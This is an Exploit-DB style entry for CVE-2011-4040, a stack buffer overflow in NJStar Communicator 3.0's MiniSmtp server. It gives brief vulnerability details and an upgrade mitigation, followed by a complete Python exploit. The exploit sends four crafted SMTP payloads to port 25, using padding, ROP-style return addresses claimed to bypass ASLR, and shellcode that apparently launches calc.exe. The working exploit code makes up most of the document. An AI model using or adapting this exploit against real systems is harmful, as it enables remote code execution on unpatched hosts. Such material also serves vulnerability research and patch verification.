NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]

vendor:

NJStar Communicator

by:

Zune - Julian Pulido

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: NJStar Communicator

Affected Version From: 3

Affected Version To: 3

Patch Exists: YES

Related CWE: CVE-2011-4040

CPE: a:njstar:njstar_communicator

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 Ultimate

2011

NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]

NJStar Communicator 3.0 MiniSmtp is vulnerable to a buffer overflow attack. The vulnerability is caused due to a boundary error when handling SMTP commands. This can be exploited to cause a stack-based buffer overflow by sending an overly long, specially-crafted SMTP command to the affected application. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to NJStar Communicator 3.0 Build 11819 or later.

Source

Exploit-DB raw data:

# Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]
# Date: 02/12/11
# Author: Zune - Julian Pulido
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.0
# Build: 11818 and previous  
# Tested on: Windows 7 Ultimate
# CVE:2011-4040


#! /usr/local/bin/python

import socket
import time

carriage= chr(0xd) 
#######################################
Padding1= chr(0x31)* 275
Jump= '\x8d\x44\x24\x80\xff\xe0\x90\x90'
Junk1= chr(0x90)* 4
return1= '\x2d\x12\x41' # pop retn
egg1= Padding1+Jump+Junk1+return1+carriage 

#######################################
Padding2= chr(0x32)* 271
return2= '\x2b\x12\x41' # pop pop pop retn
egg2= Padding2+return2+carriage

#######################################
Padding3= chr(0x33) * 263
return3= '\x2d\x12\x41' # pop retn
egg3= Padding3+return3+carriage

#######################################
Padding4= chr(0x34) * 171
Padding5= chr(0x34) * 22
ShellCode = "\xC7\x43\x20\x63\x61\x6C\x63\xC7\x43\x24\x2E\x65\x78\x65\x33\xC0\
\x66\xB8\x1A\x08\xC1\xE0\x08\xB0\x79\x03\xE8\x8D\x43\x20\x33\xC9\xB1\x01\xC1\
\xC1\x0C\x2B\xE1\x6A\x05\x50\xFF\xD5\x8D\x85\x85\x44\xF8\xFF\x6A\x01\xFF\xD0"

return4= '\x2b\x12\x41' # pop pop pop retn
egg4= Padding4+ShellCode+Padding5+return4+carriage

#######################################

def Send_SMTP (egg):
    connectionx.send(egg +'\n')
    time.sleep(2)
    
connectionx = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "Exploit NJStar Communicator 3.0 MiniSmtp by Zune\n"
print "Windows 7 Ultimate [ASLR Bypass]"
try:
    connectionx.connect(("192.168.1.65",25))#SMTP port 25
    Send_SMTP(egg1)
    Send_SMTP(egg2)
    Send_SMTP(egg3)
    Send_SMTP(egg4)
    connectionx.close()
except socket.error:
    print "it couldn't connect"
    time.sleep(2)